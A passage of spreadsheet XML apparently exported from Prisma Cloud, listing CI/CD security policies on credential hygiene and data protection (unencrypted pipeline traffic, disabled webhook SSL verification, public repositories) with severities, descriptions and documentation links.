      <c r="N150" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O150" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P150" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q150" t="inlineStr"/>
      <c r="R150" t="inlineStr"/>
      <c r="S150" t="inlineStr"/>
      <c r="T150" t="b">
        <v>0</v>
      </c>
      <c r="U150" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V150" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W150" t="inlineStr">
        <is>
          <t>Long-term credentials intended to be used by GitLab CI/CD to authenticate to a cloud provider account are stored on GitLab as variables. This increases the impact of credential theft, since stolen credentials can be used long after a pipeline run is complete.</t>
        </is>
      </c>
      <c r="X150" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-cicd-access-cloudprovider-longterm-credentials</t>
        </is>
      </c>
      <c r="Y150" t="inlineStr"/>
      <c r="Z150" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA150" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB150" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC150" t="inlineStr"/>
      <c r="AD150" t="b">
        <v>1</v>
      </c>
      <c r="AE150" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF150" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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0" t="inlineStr">
        <is>
          <t>96e27870-7fe7-47f9-b13d-298d2404c013</t>
        </is>
      </c>
      <c r="AI150" t="inlineStr"/>
      <c r="AJ150" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK150" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" t="inlineStr"/>
      <c r="B151" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C151" s="2" t="inlineStr"/>
      <c r="D151" t="inlineStr"/>
      <c r="E151" t="inlineStr"/>
      <c r="F151" t="inlineStr"/>
      <c r="G151" t="b">
        <v>1</v>
      </c>
      <c r="H1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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J151" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="K151" t="inlineStr">
        <is>
          <t>Jenkins credentials stored with global scope</t>
        </is>
      </c>
      <c r="L151" t="inlineStr"/>
      <c r="M151" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N151" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O151" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P151" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q151" t="inlineStr"/>
      <c r="R151" t="inlineStr"/>
      <c r="S151" t="inlineStr"/>
      <c r="T151" t="b">
        <v>0</v>
      </c>
      <c r="U151" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V151" t="inlineStr">
        <is>
          <t>CI/CD:Credential Hygiene:</t>
        </is>
      </c>
      <c r="W151" t="inlineStr">
        <is>
          <t>By default, Jenkins credentials are stored under the global scope. Global scope credentials are accessible by all Jenkins jobs, which increases the risk of credential theft by executing a malicious job in the instance.</t>
        </is>
      </c>
      <c r="X151" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-credentials-stored-global-scope</t>
        </is>
      </c>
      <c r="Y151" t="inlineStr"/>
      <c r="Z151" t="inlineStr">
        <is>
          <t>{"category":"Credential Hygiene","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA151" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB151" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC151" t="inlineStr"/>
      <c r="AD151" t="b">
        <v>1</v>
      </c>
      <c r="AE151" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF151" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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1" t="inlineStr">
        <is>
          <t>76ca0afe-abd9-413a-8468-13d8d522ce45</t>
        </is>
      </c>
      <c r="AI151" t="inlineStr"/>
      <c r="AJ151" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK151" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" t="inlineStr"/>
      <c r="B152" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C152" s="2" t="inlineStr"/>
      <c r="D152" t="inlineStr"/>
      <c r="E152" t="inlineStr"/>
      <c r="F152" t="inlineStr"/>
      <c r="G152" t="b">
        <v>1</v>
      </c>
      <c r="H1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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J152" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K152" t="inlineStr">
        <is>
          <t>GitLab CI pipeline commands transmit data over an unencrypted channel</t>
        </is>
      </c>
      <c r="L152" t="inlineStr"/>
      <c r="M152" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N152" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O152" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P152" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q152" t="inlineStr"/>
      <c r="R152" t="inlineStr"/>
      <c r="S152" t="inlineStr"/>
      <c r="T152" t="b">
        <v>0</v>
      </c>
      <c r="U152" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V152" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W152" t="inlineStr">
        <is>
          <t>Pipeline commands transmitting data over an unencrypted layer such as HTTP allow attackers to perform a man-in-the-middle attack to intercept, tamper with and/or steal information, to possibly run code in the build system and to reach the production environment.</t>
        </is>
      </c>
      <c r="X152" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-cipipeline-transmit-data-unencryptedchannel</t>
        </is>
      </c>
      <c r="Y152" t="inlineStr"/>
      <c r="Z152" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA152" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB152" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC152" t="inlineStr"/>
      <c r="AD152" t="b">
        <v>1</v>
      </c>
      <c r="AE152" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF152" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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2" t="inlineStr">
        <is>
          <t>6e7a8593-7e7e-4d84-a860-a53b3c13f957</t>
        </is>
      </c>
      <c r="AI152" t="inlineStr"/>
      <c r="AJ152" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK152" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" t="inlineStr"/>
      <c r="B153" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C153" s="2" t="inlineStr"/>
      <c r="D153" t="inlineStr"/>
      <c r="E153" t="inlineStr"/>
      <c r="F153" t="inlineStr"/>
      <c r="G153" t="b">
        <v>1</v>
      </c>
      <c r="H1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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J153" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K153" t="inlineStr">
        <is>
          <t>BitBucket private repository made public</t>
        </is>
      </c>
      <c r="L153" t="inlineStr"/>
      <c r="M153" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N153" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O153" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P153" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q153" t="inlineStr"/>
      <c r="R153" t="inlineStr"/>
      <c r="S153" t="inlineStr"/>
      <c r="T153" t="b">
        <v>0</v>
      </c>
      <c r="U153" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V153" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W153" t="inlineStr">
        <is>
          <t>A private repository made public allows anyone to access the source code in the repository and to retrieve hard-coded credentials and potentially sensitive information. An attacker might also perform a Public-PPE (3PE) attack and reach the production environment. For more on 3PE see https://www.paloaltonetworks.com/blog/prisma-cloud/poisoned-pipeline-execution-deep-dive Note that the severity of this risk is reduced on self hosted instances that are not accessible over the internet.</t>
        </is>
      </c>
      <c r="X153" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/bitbucket-cicd-pipeline-policies/bb-private-repo-made-public</t>
        </is>
      </c>
      <c r="Y153" t="inlineStr"/>
      <c r="Z153" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA153" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB153" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC153" t="inlineStr"/>
      <c r="AD153" t="b">
        <v>1</v>
      </c>
      <c r="AE153" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF153" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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3" t="inlineStr">
        <is>
          <t>29816f30-66a5-4471-920c-032499fc3bb3</t>
        </is>
      </c>
      <c r="AI153" t="inlineStr"/>
      <c r="AJ153" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK153" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" t="inlineStr"/>
      <c r="B154" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C154" s="2" t="inlineStr"/>
      <c r="D154" t="inlineStr"/>
      <c r="E154" t="inlineStr"/>
      <c r="F154" t="inlineStr"/>
      <c r="G154" t="b">
        <v>1</v>
      </c>
      <c r="H1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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J154" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K154" t="inlineStr">
        <is>
          <t>Jenkins pipeline commands transmit data over an unencrypted channel</t>
        </is>
      </c>
      <c r="L154" t="inlineStr"/>
      <c r="M154" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N154" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O154" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P154" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q154" t="inlineStr"/>
      <c r="R154" t="inlineStr"/>
      <c r="S154" t="inlineStr"/>
      <c r="T154" t="b">
        <v>0</v>
      </c>
      <c r="U154" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V154" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W154" t="inlineStr">
        <is>
          <t>Pipeline commands transmitting data over an unencrypted layer such as HTTP allow attackers to perform a man-in-the-middle attack to intercept, tamper with and/or steal information, to possibly run code in the build system and to reach the production environment.</t>
        </is>
      </c>
      <c r="X154" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-pipeline-transmit-data-unencryptedchannel</t>
        </is>
      </c>
      <c r="Y154" t="inlineStr"/>
      <c r="Z154" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA154" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB154" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC154" t="inlineStr"/>
      <c r="AD154" t="b">
        <v>1</v>
      </c>
      <c r="AE154" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF154" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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4" t="inlineStr">
        <is>
          <t>2bb1bbf2-cfb8-452f-98c4-ae45fe0ce7a6</t>
        </is>
      </c>
      <c r="AI154" t="inlineStr"/>
      <c r="AJ154" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK154" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" t="inlineStr"/>
      <c r="B155" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C155" s="2" t="inlineStr"/>
      <c r="D155" t="inlineStr"/>
      <c r="E155" t="inlineStr"/>
      <c r="F155" t="inlineStr"/>
      <c r="G155" t="b">
        <v>1</v>
      </c>
      <c r="H1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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J155" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K155" t="inlineStr">
        <is>
          <t>Certificate not verified by Jenkins pipeline command</t>
        </is>
      </c>
      <c r="L155" t="inlineStr"/>
      <c r="M155" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N155" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O155" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P155" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q155" t="inlineStr"/>
      <c r="R155" t="inlineStr"/>
      <c r="S155" t="inlineStr"/>
      <c r="T155" t="b">
        <v>0</v>
      </c>
      <c r="U155" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V155" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W155" t="inlineStr">
        <is>
          <t>Not verifying certificates through pipeline commands allows attackers to plant their own certificate and impersonate a server in order to perform a man-in-the-middle attack to intercept, tamper with and/or steal information, to possibly run code in the build system and to reach the production environment.</t>
        </is>
      </c>
      <c r="X155" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/jenkins-cicd-pipeline-policies/jenkins-cert-unverified</t>
        </is>
      </c>
      <c r="Y155" t="inlineStr"/>
      <c r="Z155" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA155" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB155" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC155" t="inlineStr"/>
      <c r="AD155" t="b">
        <v>1</v>
      </c>
      <c r="AE155" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF155" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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5" t="inlineStr">
        <is>
          <t>24198dc6-4c0e-4842-b398-7359902749b2</t>
        </is>
      </c>
      <c r="AI155" t="inlineStr"/>
      <c r="AJ155" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK155" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" t="inlineStr"/>
      <c r="B156" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C156" s="2" t="inlineStr"/>
      <c r="D156" t="inlineStr"/>
      <c r="E156" t="inlineStr"/>
      <c r="F156" t="inlineStr"/>
      <c r="G156" t="b">
        <v>1</v>
      </c>
      <c r="H1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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J156" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K156" t="inlineStr">
        <is>
          <t>Azure Pipelines commands transmit data over an unencrypted channel</t>
        </is>
      </c>
      <c r="L156" t="inlineStr"/>
      <c r="M156" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N156" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O156" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P156" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q156" t="inlineStr"/>
      <c r="R156" t="inlineStr"/>
      <c r="S156" t="inlineStr"/>
      <c r="T156" t="b">
        <v>0</v>
      </c>
      <c r="U156" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V156" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W156" t="inlineStr">
        <is>
          <t>Pipeline commands transmitting data over an unencrypted layer such as HTTP allow attackers to perform a man-in-the-middle attack to intercept, tamper with and/or steal information, to possibly run code in the build system and to reach the production environment.</t>
        </is>
      </c>
      <c r="X156" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/azure-repo-cicd-pipeline-policies/azure-repos-pipelines-transmit-data-unencrypted-channel</t>
        </is>
      </c>
      <c r="Y156" t="inlineStr"/>
      <c r="Z156" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA156" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB156" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC156" t="inlineStr"/>
      <c r="AD156" t="b">
        <v>1</v>
      </c>
      <c r="AE156" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF156" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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6" t="inlineStr">
        <is>
          <t>87f3c4c7-44f7-4a29-8ae8-463c84510ec6</t>
        </is>
      </c>
      <c r="AI156" t="inlineStr"/>
      <c r="AJ156" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK156" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" t="inlineStr"/>
      <c r="B157" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C157" s="2" t="inlineStr"/>
      <c r="D157" t="inlineStr"/>
      <c r="E157" t="inlineStr"/>
      <c r="F157" t="inlineStr"/>
      <c r="G157" t="b">
        <v>1</v>
      </c>
      <c r="H1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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J157" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K157" t="inlineStr">
        <is>
          <t>GitHub repository webhook SSL verification is disabled</t>
        </is>
      </c>
      <c r="L157" t="inlineStr"/>
      <c r="M157" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N157" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O157" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P157" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q157" t="inlineStr"/>
      <c r="R157" t="inlineStr"/>
      <c r="S157" t="inlineStr"/>
      <c r="T157" t="b">
        <v>0</v>
      </c>
      <c r="U157" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V157" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W157" t="inlineStr">
        <is>
          <t>SSL Verification is disabled for a repository webhook, which instructs GitHub to not verify the identity of the remote server. The lack of verification enables attackers to perform a Man In The Middle attack, and to expose the transmitted data.</t>
        </is>
      </c>
      <c r="X157" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-repo-webhook-ssl-disabled</t>
        </is>
      </c>
      <c r="Y157" t="inlineStr"/>
      <c r="Z157" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA157" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB157" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC157" t="inlineStr"/>
      <c r="AD157" t="b">
        <v>1</v>
      </c>
      <c r="AE157" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF157" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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7" t="inlineStr">
        <is>
          <t>3e0d74a9-04b3-4379-931f-ca50560ec828</t>
        </is>
      </c>
      <c r="AI157" t="inlineStr"/>
      <c r="AJ157" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK157" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" t="inlineStr"/>
      <c r="B158" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C158" s="2" t="inlineStr"/>
      <c r="D158" t="inlineStr"/>
      <c r="E158" t="inlineStr"/>
      <c r="F158" t="inlineStr"/>
      <c r="G158" t="b">
        <v>1</v>
      </c>
      <c r="H1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8" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J158" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K158" t="inlineStr">
        <is>
          <t>GitLab Webhooks sent over unencrypted channel</t>
        </is>
      </c>
      <c r="L158" t="inlineStr"/>
      <c r="M158" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N158" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O158" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P158" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q158" t="inlineStr"/>
      <c r="R158" t="inlineStr"/>
      <c r="S158" t="inlineStr"/>
      <c r="T158" t="b">
        <v>0</v>
      </c>
      <c r="U158" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V158" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W158" t="inlineStr">
        <is>
          <t>The repository sends events to a webhook over an unencrypted layer. An attacker executing a man-in-the-middle attack can steal or modify the data sent to the webhook.</t>
        </is>
      </c>
      <c r="X158" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/gitlab-cicd-pipeline-policies/gl-webhooks-sent-unencrypted-channel</t>
        </is>
      </c>
      <c r="Y158" t="inlineStr"/>
      <c r="Z158" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA158" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB158" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC158" t="inlineStr"/>
      <c r="AD158" t="b">
        <v>1</v>
      </c>
      <c r="AE158" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF158" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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8" t="inlineStr">
        <is>
          <t>20ac151c-a493-42a4-bc26-60e34524a825</t>
        </is>
      </c>
      <c r="AI158" t="inlineStr"/>
      <c r="AJ158" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK158" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" t="inlineStr"/>
      <c r="B159" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C159" s="2" t="inlineStr"/>
      <c r="D159" t="inlineStr"/>
      <c r="E159" t="inlineStr"/>
      <c r="F159" t="inlineStr"/>
      <c r="G159" t="b">
        <v>1</v>
      </c>
      <c r="H1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9" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J159" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K159" t="inlineStr">
        <is>
          <t>Public repository created in GitHub</t>
        </is>
      </c>
      <c r="L159" t="inlineStr"/>
      <c r="M159" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N159" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O159" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P159" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q159" t="inlineStr"/>
      <c r="R159" t="inlineStr"/>
      <c r="S159" t="inlineStr"/>
      <c r="T159" t="b">
        <v>0</v>
      </c>
      <c r="U159" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V159" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="W159" t="inlineStr">
        <is>
          <t>The unregulated creation of public repositories can pose a risk of leaking sensitive data such as credentials, proprietary source code and addresses of organizational asset addresses, due to human error.</t>
        </is>
      </c>
      <c r="X159" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/ci-cd-pipeline-policies/github-cicd-pipeline-policies/gh-public-repo-created</t>
        </is>
      </c>
      <c r="Y159" t="inlineStr"/>
      <c r="Z159" t="inlineStr">
        <is>
          <t>{"category":"Data Protection","resourceTypes":[]}</t>
        </is>
      </c>
      <c r="AA159" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB159" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC159" t="inlineStr"/>
      <c r="AD159" t="b">
        <v>1</v>
      </c>
      <c r="AE159" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF159" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG1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9" t="inlineStr">
        <is>
          <t>8259fdf3-9537-4bf9-bcc6-579bdc1e2363</t>
        </is>
      </c>
      <c r="AI159" t="inlineStr"/>
      <c r="AJ159" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK159" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" t="inlineStr"/>
      <c r="B160" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C160" s="2" t="inlineStr"/>
      <c r="D160" t="inlineStr"/>
      <c r="E160" t="inlineStr"/>
      <c r="F160" t="inlineStr"/>
      <c r="G160" t="b">
        <v>1</v>
      </c>
      <c r="H1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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J160" t="inlineStr">
        <is>
          <t>CI/CD:Data Protection:</t>
        </is>
      </c>
      <c r="K160" t="inlineStr">
        <is>
          <t>GitLab project webhook SSL verification disabled</t>
        </is>
      </c>
      <c r="L160" t="inlineStr"/>
      <c r="M160" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N160" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O160" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P160" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q160" t="inlineStr"/>
      <c r="R160" t="inlineStr"/>
      <c r="S160" t="inlineStr"/>
      <c r="T160" t="b">
        <v>0</v>
      </c>
      <c r="U160" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
